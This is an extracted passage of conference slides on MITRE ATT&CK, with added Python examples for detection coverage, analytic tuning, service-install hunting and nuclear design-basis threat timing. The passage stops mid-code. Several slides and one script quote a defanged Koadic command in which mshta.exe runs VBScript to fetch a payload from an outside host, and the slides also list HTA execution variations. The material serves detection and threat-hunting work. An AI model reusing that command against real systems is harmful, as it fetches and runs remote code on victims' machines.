13. MY WISHLIST
● Load DB with ATT&CK content
● Use TRAM to load new relationships
● Manually add adversary mappings
● Create more relationships (industries, dates, adversary types…)
● Explore relationships through GUI
● Edit selected data through GUI
● Edit relationships through GUI
● Export data to ATT&CK Navigator
● Dockerize everything for easy deployment
18. SO FAR…
● Load DB with ATT&CK content
● Use TRAM to load new relationships
● Manually add adversary mappings
● Create more relationships (industries, dates, adversary types…)
● Explore relationships through GUI
● Edit selected data through GUI
● Edit relationships through GUI
● Export data to ATT&CK Navigator
● Dockerize everything for easy deployment
34. GOALS
● Create more relationships (dates, adversary types…)
● Manually load new mapping
● Edit relationships through UI
● Dockerize everything for easy deployment
● Add relational graphs to study the adversaries
36. CREDITS: This presentation template was created by Slidesgo, including icons by Flaticon, and infographics & images by Freepik.
THANKS!
Do you have any questions?
@fierytermite
linkedin.com/in/valentinapalacin
37. From Theory to Practice: How My ATT&CK® Perspectives Have Changed
Katie Nickels
ATT&CKcon Power Hour
December 11, 2020
38. Yes, this is being recorded. Yes, the slides will be shared. No, I don’t know when. Soon.
39. About Me
Katie Nickels
DIRECTOR OF INTELLIGENCE, RED CANARY
@LiketheCoins
§ Former MITRE ATT&CK Team Member (relevant)
§ SANS Certified Instructor for FOR578: Cyber Threat Intelligence
§ Bringing context about threats to inform decisions
§ Maintaining sanity with exercise, chocolate, containers, and holiday lights
41. How I've thought differently about ATT&CK
1. Tracking tactics, techniques, and procedures
2. Defining detection coverage
3. Choosing what to detect
43. Tracking TTPs the MITRE way
https://attack.mitre.org/techniques/T1218/005/
Tactic: Defense Evasion
Technique/Sub-technique: Signed Binary Proxy Execution: Mshta
Procedure: Koadic can use MSHTA to serve additional payloads.[13]
46. Example of tracking beyond TTPs
Defense Evasion/Execution
T1218.005 Signed Binary Proxy Execution: Mshta
Koadic used VBScript to launch mshta.exe and make an external network connection
C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
47. Primary Tactic: Execution
Additional Tactics: TA0005 Defense Evasion
Techniques:
T1218.005 Signed Binary Proxy Execution: Mshta
T1059.005 Command and Scripting Interpreter: Visual Basic
Procedure ★: Koadic uses VBScript to launch mshta.exe and make an external network connection.
Observable: C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close)
Detectors (Name / Targeted to this profile?):
WIN-MSHTA-CLI-URL / No
WIN-MSHTA-NON-HTA / No
WIN-MSHTA-INLINE-VBSCRIPT / No
48. What this format lets us do
§ Track detailed observables from endpoint telemetry
§ Identify where we have detection coverage (or not)
§ Use ATT&CK tactics, techniques, and sub-techniques
...but add on because it meets our needs
50. Defining coverage by confidence
https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
51. The challenge of unlimited procedures
“You should also remember that each ATT&CK technique may
have many procedures for how an adversary could implement
it — and because adversaries are always changing, we can’t
know what all those procedures are in advance.”
https://medium.com/mitre-attack/how-to-be-a-savvy-attack-consumer-63e45b8e94c9
52. Katie: “There are unlimited procedures!”
§ Matt: “But are there?”
o Think of techniques like MSHTA
o Commands only have so many flags
§ We may be able to scope some technique variations
55. Nine known variations for HTA
1. HTA can have any file name and extension
2. Specifying a URI from where HTA content is first downloaded
3. Use of scripting engines
4. Specifying protocol handlers (e.g., “vbscript”, “javascript”, “about”)
5. HTA content embedded and executed from within other file formats
6. HTA content can be executed remotely via UNC paths.
7. Remote HTA execution via COM interface (lateral movement)
8. HTA execution by double clicking or invoking with “explorer.exe foo.hta”
9. Full control over the path and filename of mshta.exe and rundll32.exe
https://redcanary.com/blog/threat-research-questions
56. Adding in variations
Defense Evasion/Execution
T1218.005 Signed Binary Proxy Execution: Mshta
Specifying protocol handler + direct download from URI
Koadic used VBScript to launch mshta.exe and make an external network connection
C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
57. Mix and match the variations
Specifying protocol handler: vbscript:
Direct download from URI: mshta hxxp[:]//8.8.8[.]8:123/
Specifying protocol handler: jscript:
https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/TestHarnesses/T1218.005_Mshta
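The variation list and the three detector names on the profile slide (WIN-MSHTA-CLI-URL, WIN-MSHTA-NON-HTA, WIN-MSHTA-INLINE-VBSCRIPT) suggest a simple way to see where variations outrun detectors. The Python below is an added example, not Red Canary's detector logic and not the Atomic test harness linked above: it parses an mshta.exe command line, labels the variations present (protocol handler, direct download from a URI, non-.hta file argument) and reports which of the three named detectors would fire, so a variation with no detector surfaces as a coverage gap. The mapping from variation to detector name is an assumption, and every command line except the defanged Koadic observable from the slide is constructed.

```python
import re
from dataclasses import dataclass, field

# Constructed sample command lines. The first is the (defanged) Koadic
# observable from the slides; the rest are constructed variants that
# exercise the other variation labels.
SAMPLE_COMMAND_LINES = [
    r'C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)',
    r'C:\Windows\system32\mshta.exe hxxp[:]//8.8.8[.]8/page.hta',
    r'C:\Windows\system32\mshta.exe C:\Users\Public\invoice.txt',
    r'C:\Windows\system32\mshta.exe "C:\Program Files\Vendor\setup.hta"',
    r'C:\Windows\system32\mshta.exe javascript:close()',
]

# Assumed mapping from variation label to the detector names on the slide.
# Only the vbscript handler has a named detector; other handlers are a gap.
DETECTORS_BY_VARIATION = {
    "uri_download": "WIN-MSHTA-CLI-URL",
    "non_hta_argument": "WIN-MSHTA-NON-HTA",
    "inline_vbscript": "WIN-MSHTA-INLINE-VBSCRIPT",
}

_IMAGE_RE = re.compile(r'^\s*"?(?P<image>[^"\s]*mshta\.exe)"?\s*(?P<arg>.*)$', re.I)
_HANDLER_RE = re.compile(r'^(?P<handler>vbscript|javascript|jscript|about):', re.I)
# Matches both live (http://) and defanged (hxxp[:]//) URIs.
_URI_RE = re.compile(r'\b(?:hxxps?|https?)\[?:\]?//', re.I)


@dataclass
class MshtaClassification:
    image: str
    argument: str
    variations: set = field(default_factory=set)

    @property
    def detectors(self) -> set:
        """Detector names that would fire for the observed variations."""
        return {DETECTORS_BY_VARIATION[v] for v in self.variations if v in DETECTORS_BY_VARIATION}

    @property
    def is_gap(self) -> bool:
        """A suspicious variation is present but no named detector covers it."""
        return bool(self.variations) and not self.detectors


def classify_mshta(cmdline: str):
    """Label the variations present in one mshta.exe command line.

    Returns None when the command line is not an mshta.exe invocation.
    """
    m = _IMAGE_RE.match(cmdline)
    if not m:
        return None
    arg = m.group("arg").strip()
    result = MshtaClassification(image=m.group("image"), argument=arg)

    handler = _HANDLER_RE.match(arg)
    if handler:
        result.variations.add("protocol_handler")
        if handler.group("handler").lower() == "vbscript":
            result.variations.add("inline_vbscript")
    has_uri = bool(_URI_RE.search(arg))
    if has_uri:
        result.variations.add("uri_download")
    # A plain file argument that is not an .hta file (variation 1 on the slide).
    if arg and not handler and not has_uri:
        if not arg.strip('"').lower().endswith(".hta"):
            result.variations.add("non_hta_argument")
    return result


def coverage_gaps(cmdlines):
    """Return the command lines that show a variation no named detector covers."""
    gaps = []
    for line in cmdlines:
        c = classify_mshta(line)
        if c is not None and c.is_gap:
            gaps.append(line)
    return gaps


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        c = classify_mshta(line)
        print(sorted(c.variations), sorted(c.detectors), "GAP" if c.is_gap else "")
```

Run over the samples, the Koadic observable lights up two detectors, the javascript: handler lights up none, which is exactly the kind of gap the "mix and match" slide is pointing at: the technique is nominally covered while one of its variations is not.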
58. Testing known variation combinations
[Figure: granularity scale from "less granular" (1 technique: T1218.005 Signed Binary Proxy Execution: Mshta) to "more granular" (25 tested combinations)]
60. Remember that profile breakdown?
Techniques:
T1218.005 Signed Binary Proxy Execution: Mshta
T1059.005 Command and Scripting Interpreter: Visual Basic
Observable: Koadic uses VBScript to launch mshta.exe and make an external network connection.
C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close)
Detectors (Name / Targeted to this profile?):
WIN-MSHTA-CLI-URL / No
WIN-MSHTA-NON-HTA / No
WIN-MSHTA-INLINE-VBSCRIPT / No
61. Mapping coverage based on threats
[Figure: granularity scale from "less granular" (1 technique: T1218.005 Signed Binary Proxy Execution: Mshta) to "more granular" (6 threat observables for Mshta: Koadic observable 1, Koadic observable 2, FIN7 observable 1, FIN7 observable 2, Kovter observable 1, Lazarus observable 1)]
64. Diving deeper
[Figure: HTA test harness results alongside Mshta threat observables (Koadic observable 1, Koadic observable 2, FIN7 observable 1, FIN7 observable 2, Lazarus observable 1). Caption: "These are okay too!"]
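Slides 47, 60 and 61 make one point from two directions: the same six Mshta observables read as "one technique, covered" at technique granularity and as "three of six, mostly by detectors not written for these threats" at observable granularity. The Python below is an added example, not Red Canary's profile tooling: it models observables, detectors and the "targeted to this profile?" flag from the slide, then expresses coverage at both granularities and buckets the ratio into a confidence label in the spirit of the "coverage by confidence" slide. The six observable names come from the slide; which detectors fire on which observable, the FIN7-specific detector and the confidence thresholds are constructed assumptions.

```python
from dataclasses import dataclass
from fractions import Fraction


@dataclass(frozen=True)
class Observable:
    name: str          # e.g. "Koadic observable 1"
    threat: str        # adversary or malware family
    techniques: tuple  # ATT&CK (sub-)technique IDs the observable maps to


@dataclass(frozen=True)
class Detector:
    name: str
    targeted_to: frozenset  # threats the detector was written for (empty = generic)


# Constructed data: the six Mshta observables from the slide, all mapping to
# T1218.005 (the first Koadic one also to T1059.005, as on the profile slide).
OBSERVABLES = [
    Observable("Koadic observable 1", "Koadic", ("T1218.005", "T1059.005")),
    Observable("Koadic observable 2", "Koadic", ("T1218.005",)),
    Observable("FIN7 observable 1", "FIN7", ("T1218.005",)),
    Observable("FIN7 observable 2", "FIN7", ("T1218.005",)),
    Observable("Kovter observable 1", "Kovter", ("T1218.005",)),
    Observable("Lazarus observable 1", "Lazarus", ("T1218.005",)),
]

# The three detector names from the slide plus one constructed, FIN7-targeted detector.
DETECTORS = {
    "WIN-MSHTA-CLI-URL": Detector("WIN-MSHTA-CLI-URL", frozenset()),
    "WIN-MSHTA-NON-HTA": Detector("WIN-MSHTA-NON-HTA", frozenset()),
    "WIN-MSHTA-INLINE-VBSCRIPT": Detector("WIN-MSHTA-INLINE-VBSCRIPT", frozenset()),
    "WIN-MSHTA-FIN7-LOADER": Detector("WIN-MSHTA-FIN7-LOADER", frozenset({"FIN7"})),
}

# Which detectors fire on which observable (constructed assumption).
MATCHES = {
    "Koadic observable 1": {"WIN-MSHTA-CLI-URL", "WIN-MSHTA-INLINE-VBSCRIPT"},
    "Koadic observable 2": set(),
    "FIN7 observable 1": {"WIN-MSHTA-FIN7-LOADER"},
    "FIN7 observable 2": set(),
    "Kovter observable 1": {"WIN-MSHTA-NON-HTA"},
    "Lazarus observable 1": set(),
}


def observable_coverage(observables=OBSERVABLES, matches=MATCHES, detectors=DETECTORS):
    """More granular view: per observable, does anything fire, and is it targeted?"""
    rows = []
    for obs in observables:
        fired = matches.get(obs.name, set())
        targeted = any(obs.threat in detectors[d].targeted_to for d in fired)
        rows.append({"observable": obs.name, "threat": obs.threat,
                     "covered": bool(fired), "targeted": targeted})
    return rows


def confidence_label(ratio):
    """Assumed bucketing of a coverage ratio into a confidence label."""
    if ratio == 0:
        return "None"
    if ratio < Fraction(1, 3):
        return "Low"
    if ratio < Fraction(2, 3):
        return "Some"
    return "High"


def technique_coverage(observables=OBSERVABLES, matches=MATCHES):
    """Less granular view: per technique, how many known observables are covered."""
    per_technique = {}
    for obs in observables:
        for tid in obs.techniques:
            entry = per_technique.setdefault(tid, {"observables": 0, "covered": 0})
            entry["observables"] += 1
            if matches.get(obs.name):
                entry["covered"] += 1
    for entry in per_technique.values():
        entry["confidence"] = confidence_label(Fraction(entry["covered"], entry["observables"]))
    return per_technique


if __name__ == "__main__":
    for row in observable_coverage():
        print(row)
    print(technique_coverage())
```

The technique view is what a Navigator heat map would show; the observable view is what tells you that the Koadic rows are caught only by generic detectors and that half the known Mshta observables are not caught at all.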
65. Expressing coverage is just tough
§ Any way you express it will have limitations
§ There’s no “right” or “wrong” way to do it
...but there may be “better” ways for your needs
§ Figure out the requirement for what you’re doing
o What are you trying to convey and achieve?
o What’s your goal of expressing the coverage?
67. Finding “good” detection opportunities
§ Not everything is useful for detection
§ Choosing is most of the battle
https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
68. Discovery techniques
§ “Discovery techniques aren’t that useful for detection”
https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
70. Testing & tuning is most of the work
§ “This should NEVER happen in an environment, let’s write a detection analytic!” —Me in January 2020
§ “Here’s a hypothesis that will probably be noisy so here are five ways to tune it when that happens.” —Me in December 2020
§ If an analytic is noisy…how can we tune it?
o Narrow it down? Use threat intelligence.
o Easily suppress on false positives?
https://redcanary.com/blog/tuning-detectors/
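The two tuning knobs named on this slide, narrowing with threat intelligence and suppressing known false positives, can be shown on the discovery-technique case from the previous slide, where a bare "account discovery command ran" analytic is noisy. The Python below is an added example, not a Red Canary detector: it runs the naive analytic over constructed process events, then applies named suppression rules and uses an assumed threat-intelligence list of user-facing parent processes to rank what is left. Hosts, users, the allow-listed admin-on-jump-host pair and the agent names are all constructed.

```python
from dataclasses import dataclass
from typing import Callable

# Constructed process events (not real telemetry); a minimal subset of the
# fields an EDR process event carries.
EVENTS = [
    {"host": "WS01", "user": "jdoe", "parent": "winword.exe", "process": "whoami.exe", "cmdline": "whoami /all"},
    {"host": "WS02", "user": "msmith", "parent": "cmd.exe", "process": "net.exe", "cmdline": 'net group "Domain Admins" /domain'},
    {"host": "JUMP01", "user": "itadmin", "parent": "cmd.exe", "process": "net.exe", "cmdline": 'net group "Domain Admins" /domain'},
    {"host": "WS03", "user": "SYSTEM", "parent": "inventoryagent.exe", "process": "whoami.exe", "cmdline": "whoami"},
    {"host": "WS04", "user": "jroe", "parent": "cmd.exe", "process": "ipconfig.exe", "cmdline": "ipconfig /all"},
    {"host": "SRV01", "user": "svc_monitor", "parent": "monitoragent.exe", "process": "whoami.exe", "cmdline": "whoami /groups"},
]

# Account-discovery binaries the naive analytic keys on.
DISCOVERY_PROCESSES = {"whoami.exe", "net.exe", "net1.exe"}


def raw_hits(events):
    """The 'this should NEVER happen' version: every discovery command is a hit."""
    return [e for e in events if e["process"].lower() in DISCOVERY_PROCESSES]


@dataclass
class Suppression:
    reason: str
    applies: Callable[[dict], bool]


# Constructed environment knowledge used to tune the analytic.
ADMIN_ACCOUNTS_ON_JUMP_HOSTS = {("itadmin", "JUMP01")}
INVENTORY_AGENTS = {"inventoryagent.exe", "monitoragent.exe"}
# Parents that (assumed) threat intelligence ties to phishing-delivered tradecraft.
USER_FACING_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe"}

SUPPRESSIONS = [
    Suppression("known admin on jump host",
                lambda e: (e["user"], e["host"]) in ADMIN_ACCOUNTS_ON_JUMP_HOSTS),
    Suppression("spawned by inventory/monitoring agent",
                lambda e: e["parent"].lower() in INVENTORY_AGENTS),
]


def tuned_hits(events, suppressions=SUPPRESSIONS):
    """Apply suppressions to the raw hits, then rank survivors with threat intel.

    Returns (hits, suppressed); each suppressed event records why it was dropped
    so the tuning stays auditable.
    """
    hits, suppressed = [], []
    for e in raw_hits(events):
        reasons = [s.reason for s in suppressions if s.applies(e)]
        if reasons:
            suppressed.append({**e, "suppressed_by": reasons})
            continue
        priority = "high" if e["parent"].lower() in USER_FACING_PARENTS else "medium"
        hits.append({**e, "priority": priority})
    return hits, suppressed


if __name__ == "__main__":
    print(len(raw_hits(EVENTS)), "raw hits")
    hits, suppressed = tuned_hits(EVENTS)
    for h in hits:
        print(h["priority"], h["host"], h["user"], h["cmdline"])
    for s in suppressed:
        print("suppressed", s["host"], s["suppressed_by"])
```

Keeping the suppression reasons on the dropped events is the part worth copying: when a suppression later turns out to be wrong, you can find every event it swallowed.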
72. Takeaways
§ Don’t limit yourself to just TTPs if you need to go further
§ Define detection coverage based on your requirements
§ Trial, error, and experience will help you choose what to detect
§ It’s a good thing to change your perspectives
§ Surrounding yourself with new people and new situations lets you think differently and mature
74. Sharpening your Threat Hunting Program with ATT&CK Framework
Hieu Tran
Detection Team Lead | FPT Cybersecurity Division
75. INDEX
Sharpening your Threat Hunting Program with ATT&CK framework
01 Threat Hunting vs Threat Detection
02 Threat Hunting Methodology
03 MITRE ATT&CK - Threat Hunter Common Language
04 Case study
05 Key takeaways
06 Q&A
76. Human-driven (and assisted by tools) practice of searching iteratively through data to detect advanced threats that evade traditional security controls
77. Threat Hunting vs Threat Detection
Threat Hunting
DEFINITION
• Proactive
• Humans find bad stuff with the help of machines
PROs
• Identifying detection gaps and creating new detections
CONs
• Needs security experts for searching, hunting, etc.
• Slow and expensive
Threat Detection
DEFINITION
• Reactive
• Automated with machines such as SIEM, IDS/IPS, AV, etc.
PROs
• Least expensive approach
CONs
• Likely to miss something (False Negatives)
• Too much time spent because of alert fatigue (False Positives)
79. NUMBERS TELL STORIES: GLOBAL DWELL TIME
It takes so long to detect bad guys inside your organization.
Source: FireEye Mandiant M-Trends 2020 Special Report
80. Threat Hunting Methodology
1. Target: Scope the data sets that will be used in your investigation. Hunts can branch from various starting points.
2. Hunt: Proactively and iteratively search through network and endpoint data to detect and isolate advanced threats that evade more traditional security solutions.
3. Disrupt: Seamlessly pivot from hunting to forensic analysis, in order to disrupt adversaries before they fully execute their attacks. These analyses can also generate new indicators that can be fed into complementary security systems, creating a valuable security feedback loop.
83. Case Study: APT32
Threat Hunting and Incident Response against Cyber Espionage
Threat Actors: APT32 – OceanLotus/SeaLotus/CobaltKitty
Our customer's situation at the time:
• Large enterprise with a huge number of endpoints: ~1000 servers, 6000 workstations.
• Core services (Active Directory, Email Server, Antivirus Management) already compromised.
• Operations and security staff machines were compromised.
IT IS CHAOS
85. Case Study: APT32
Based on what we found on compromised servers/workstations, we built our hypothesis:
• Gain Initial Access by using Spear Phishing to gather Valid (administrator) Accounts.
• Execute the malicious payload with Living-off-the-land Binary (LOLBIN) techniques.
• Maintain Persistence by installing a New Service or Registry Run Keys.
• Stay under the radar (Defense Evasion) by Software Packing, DLL Hijacking, File Deletion….
• Discovery by Network Service Scanning and Brute Forcing using custom malware/scripts.
• C2 Communication using Commonly Used Ports (80, 443, 53)
88. Case Study #1
We deployed independent hunting stacks:
• Endpoint Detection & Response
• Data lake (gathering all essential service logs, including DNS, Proxy, AD…)
• Advanced Threat Detection
• Network Detection & Response
Automated lots of work by leveraging OpenAPI:
• Quickly deploy data acquisition scripts across the enterprise infrastructure.
• Prevent active C2 connections with Endpoint Isolation and Binary Isolation.
• Speed up cleaning of malware artifacts (remove binary files, executable files and registry run keys).
89. Case Study #1
At the end of the day, we discovered:
• 13 C2 domains and 12 C2 IPs:
  • 04 C2 domains had never been seen before.
• 26 servers and 96 clients were compromised.
• 09 UserSIDs were used to install malicious services.
• Multiple malware artifacts, which could be divided into 03 groups:
  • Binary files (.exe and .dll files)
  • Script (PowerShell, C#, JScript, .NET)
  • Webshell (PHP Script)
  • C2 Payload (found in Registry)
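The persistence hypothesis above ("installing New Service") and the finding that a handful of UserSIDs installed the malicious services together describe one concrete hunt: pivot on who installs services and where the service binaries live. The Python below is an added example, not FPT's hunting stack or any vendor query language: it walks constructed records shaped like Windows System log event 7045 ("A service was installed in the system"), each with the SID of the installing account, groups them by installer SID, and flags SIDs whose services run from outside trusted directories or that pushed the same service to several hosts. The hosts, SIDs, service names, paths and the three-host breadth threshold are all constructed.

```python
from collections import defaultdict

# Constructed records shaped like event 7045 plus the installer's SID.
# Every host name, SID, service name and path here is made up.
SERVICE_INSTALLS = [
    {"host": "SRV-DC01", "installer_sid": "S-1-5-21-100-200-300-500", "service": "WinDefend",
     "image_path": r"C:\Program Files\Windows Defender\MsMpEng.exe"},
    {"host": "WS-0042", "installer_sid": "S-1-5-21-100-200-300-1105", "service": "WinUpdateSvc",
     "image_path": r"C:\ProgramData\WinUpdate\svchost.exe"},
    {"host": "WS-0107", "installer_sid": "S-1-5-21-100-200-300-1105", "service": "WinUpdateSvc",
     "image_path": r"C:\ProgramData\WinUpdate\svchost.exe"},
    {"host": "SRV-MAIL01", "installer_sid": "S-1-5-21-100-200-300-1105", "service": "WinUpdateSvc",
     "image_path": r"C:\ProgramData\WinUpdate\svchost.exe"},
    {"host": "SRV-AV01", "installer_sid": "S-1-5-21-100-200-300-2210", "service": "PSEXESVC",
     "image_path": r"C:\Windows\PSEXESVC.exe"},
    {"host": "WS-0311", "installer_sid": "S-1-5-21-100-200-300-2210", "service": "NetSvcHelper",
     "image_path": r"C:\Users\Public\Libraries\nethelper.exe"},
    {"host": "SRV-FILE01", "installer_sid": "S-1-5-21-100-200-300-500", "service": "BackupAgent",
     "image_path": r"C:\Program Files\VendorBackup\agent.exe"},
]

# Directories from which legitimately installed services normally run (assumed list).
TRUSTED_PREFIXES = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Same service installed by one SID on at least this many hosts (assumed threshold).
BREADTH_THRESHOLD = 3


def is_untrusted_path(image_path):
    """True when the service binary lives outside the trusted prefixes."""
    p = image_path.lower().strip('"')
    return not p.startswith(TRUSTED_PREFIXES)


def hunt_service_installs(records):
    """Group service installs by installer SID and return the suspicious SIDs.

    Each finding lists the hosts the SID touched and the reasons it was flagged.
    """
    by_sid = defaultdict(lambda: {"hosts": set(), "services": defaultdict(set), "untrusted_paths": set()})
    for r in records:
        entry = by_sid[r["installer_sid"]]
        entry["hosts"].add(r["host"])
        entry["services"][r["service"]].add(r["host"])
        if is_untrusted_path(r["image_path"]):
            entry["untrusted_paths"].add(r["image_path"])

    findings = {}
    for sid, entry in by_sid.items():
        reasons = []
        if entry["untrusted_paths"]:
            reasons.append("service binary outside trusted directories")
        for svc, hosts in entry["services"].items():
            if len(hosts) >= BREADTH_THRESHOLD:
                reasons.append(f"service {svc} installed on {len(hosts)} hosts")
        if reasons:
            findings[sid] = {"hosts": sorted(entry["hosts"]), "reasons": reasons}
    return findings


if __name__ == "__main__":
    for sid, finding in hunt_service_installs(SERVICE_INSTALLS).items():
        print(sid, finding)
```

Flagged SIDs feed straight back into the Target step of the methodology: every host a flagged SID touched becomes the scope of the next hunt, which is how a 7000-endpoint estate gets covered without reading every event.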
91. We will be able to hunt at scale with:
The right staff with the right skillsets
The right processes/procedures for hunting
The right technical solutions that enable hunters
92. Key Takeaways
1. Assume-breach mindset.
2. Train your staff in threat hunter skillsets (or outsource).
3. Build a roadmap for implementing solutions properly.
95. ABOUT THE PRESENTER
JACOB BENJAMIN – DIRECTOR OF PROFESSIONAL SERVICES
PREVIOUS ICS EXPERIENCE
+ Idaho National Laboratory
+ Areva NP
+ Duke Energy
RESEARCH AREAS
+ Nuclear Cybersecurity
+ Cyber Risk Management
+ Wireless Security
+ Software-Defined Networking
+ Malware Analysis
+ Steganography Detection
CREDENTIALS
+ Ph.D., Computer Science
+ M.S., Cybersecurity
+ B.S., Computer Science
+ CISSP
96. DESIGN BASIS THREAT (DBT) OVERVIEW
+ What is a DBT?
+ How are they developed?
+ What does a DBT look like?
+ Are there cyber DBTs?
97. EXAMPLE DBT (IAEA DBT WORKSHOP)
“ATTEMPT OF THEFT OF A SIGNIFICANT AMOUNT OF NUCLEAR MATERIAL (E.G. 10KG OF PU) BY A GROUP OF 6 OUTSIDERS EQUIPPED WITH 10 KG TNT EXPLOSIVE, AUTOMATIC WEAPONS (INCLUDING LIGHT INFANTRY WEAPONS) AND SPECIFIC COMMERCIALLY AVAILABLE INTRUSION TOOLS. THEY HAVE A COMPREHENSIVE KNOWLEDGE OF THE FACILITY AND ASSOCIATED PHYSICAL PROTECTION MEASURES. WILLING TO DIE OR TO KILL. NO COLLUSION WITH INSIDER.”
98. SENSING OPPORTUNITIES
RESPONSE TIME VS ADVERSARY TASK TIME
[Figure: timeline with markers T0, TD, Ti and Tc, labelled adversary begins task, first sensing, adversary detected, adversary interrupted and adversary completes task. Bars: adversary task time; adversary task time remaining after 1st sensing; PPS response time; detection time; response force time; time remaining after interruption.]
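The timeline on this slide is the standard physical protection system (PPS) timing argument: sensing only helps if the response force can interrupt the adversary before the task is complete, so detection time plus response force time must be shorter than the adversary task time. The Python below is an added example, not from the presentation or from any NRC or IAEA tool: it encodes an adversary path as a sequence of tasks with a delay and a sensing probability (all values constructed), finds the critical detection point, that is the last task at which the remaining task time still covers the PPS response time, and computes the probability of interruption assuming independent sensors and instant alarm communication. Treating a detection as occurring at the start of a task is a simplifying assumption.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Task:
    name: str
    delay_s: float   # time the adversary needs to finish this step
    p_detect: float  # probability the PPS senses the adversary during this step


# Constructed adversary path; delays and detection probabilities are made up.
EXAMPLE_PATH = [
    Task("cut perimeter fence", 60, 0.9),
    Task("cross yard", 120, 0.5),
    Task("breach building door", 90, 0.7),
    Task("reach target room", 180, 0.3),
    Task("complete task at target", 300, 0.1),
]


def is_timely(t_detect, response_force_time, t_complete):
    """The slide's rule: interruption Ti = TD + response force time must precede Tc."""
    return t_detect + response_force_time < t_complete


def timeline(path, detect_index, response_force_time):
    """Place T0, TD, Ti and Tc on the time axis for a detection at the start of
    task `detect_index` (T0 = adversary begins task, at time 0)."""
    t_detect = sum(t.delay_s for t in path[:detect_index])
    t_complete = sum(t.delay_s for t in path)
    t_interrupt = t_detect + response_force_time
    return {"T0": 0, "TD": t_detect, "TI": t_interrupt, "TC": t_complete,
            "timely": is_timely(t_detect, response_force_time, t_complete)}


def critical_detection_point(path, response_force_time):
    """Index of the last task at which a detection still leaves the response
    force enough time (task time remaining >= response force time).
    Returns -1 when no task on the path qualifies."""
    remaining = sum(t.delay_s for t in path)
    cdp = -1
    for i, task in enumerate(path):
        if remaining >= response_force_time:
            cdp = i
        remaining -= task.delay_s
    return cdp


def interruption_probability(path, response_force_time):
    """(cdp, P) where P is the probability that at least one sensing happens at
    or before the critical detection point; sensors are treated as independent."""
    cdp = critical_detection_point(path, response_force_time)
    p_miss_all = 1.0
    for task in path[:cdp + 1]:
        p_miss_all *= (1.0 - task.p_detect)
    return cdp, 1.0 - p_miss_all


if __name__ == "__main__":
    for rft in (400, 600, 800):
        cdp, p = interruption_probability(EXAMPLE_PATH, rft)
        print(f"response force time {rft}s: CDP={cdp}, P(interruption)={p:.4f}")
    print(timeline(EXAMPLE_PATH, 3, 400))
```

The same structure carries over to a cyber DBT: the "tasks" become the behaviours in the DBT statement, the sensing probabilities become detection coverage per behaviour, and a slow response (long containment time) moves the critical detection point earlier in the kill chain.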
99. CYBER SECURITY FOR NUCLEAR POWER PLANTS
Cybersecurity risk mitigation for nuclear power plants began in 2002 and 2003, when the NRC included cybersecurity requirements in the Physical Security and Design Basis Threat Orders.
KEY DOCUMENTS
• NEI 04-04, Voluntary Cyber Program
• 10 CFR 73.54, The Cyber Rule
• NEI 08-09, Cyber Security Plan
• NEI 13-10, Cyber Security Assessments
CHALLENGES
• Describing the cyber threat landscape
• Modeling cyber-initiated events
• Mal-operation vs malware
USING ATT&CK
• Describe threat behavior
• Conduct adversary emulation
• Evaluate actual events & case studies
100. USING TRADITIONAL DBT ANALYSIS FOR CYBER
PAST CYBER EVENTS
Nuclear sector
Energy sector
ICS overall
CREDIBLE THREAT INTELLIGENCE
Dragos World View Bulletins
CISA / ICS-CERT
Vendors
SITE SPECIFIC TARGETS
Crown Jewel Analysis
Consequence-based targeting
101. EXAMPLE CYBER DBT DEVELOPMENT
Targets
• SIS
• Turbines
• Generators
Past Events
• CrashOverride
• Trisis
• Stuxnet
Threat Intel
• World View
• CISA
• Vendors
102. CYBER DBT RESULT
ATTEMPT TO CAUSE A LOSS OF SAFETY IMPACT. ADVERSARY HAS BEEN KNOWN TO USE DRIVE-BY COMPROMISE, EXTERNAL REMOTE SERVICES, VALID ACCOUNTS, SUPPLY CHAIN COMPROMISE, AND ICS-TAILORED MALWARE. THEY HAVE DESTRUCTIVE CAPABILITIES, UNDERSTAND PROCESS IMPLICATIONS, AND HAVE SPECIFIC KNOWLEDGE OF INDUSTRIAL CONTROL SYSTEMS. WILLING TO CAUSE PHYSICAL HARM OR KILL. NO COLLUSION WITH INSIDER.
106. SUMMARY: HOW TO CREATE A CYBER DBT
• DIGEST THREAT INTELLIGENCE
  • WorldView, CISA, vendors, etc.
• UNDERSTAND YOUR SYSTEMS
  • Crown Jewel Analysis
• EVALUATE YOUR DEFENSES
  • Quantify your mitigation and detection coverage
• FOCUS ON THREAT BEHAVIORS
  • Combine and correlate this information with a common lexicon (ATT&CK)
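The last two summary items, quantify mitigation and detection coverage and express it in the ATT&CK lexicon, can be carried out directly on the cyber DBT statement from slide 102. The Python below is an added example, not the presenter's or Dragos's tooling: it writes the four named initial-access behaviours as their Enterprise ATT&CK technique IDs (Drive-by Compromise T1189, External Remote Services T1133, Valid Accounts T1078, Supply Chain Compromise T1195), joins them with a constructed per-technique mitigation/detection status, lists the techniques with neither, and emits a minimal ATT&CK Navigator layer so the result can be shown as a heat map. The site coverage values, the 0-2 scoring scale and the layer version field are assumptions; "ICS-tailored malware" is a capability statement rather than one technique and is carried as a note.

```python
import json

# The cyber DBT from the slide, expressed as Enterprise ATT&CK technique IDs.
CYBER_DBT = {
    "name": "Cyber DBT - loss of safety impact",
    "techniques": {
        "T1189": "Drive-by Compromise",
        "T1133": "External Remote Services",
        "T1078": "Valid Accounts",
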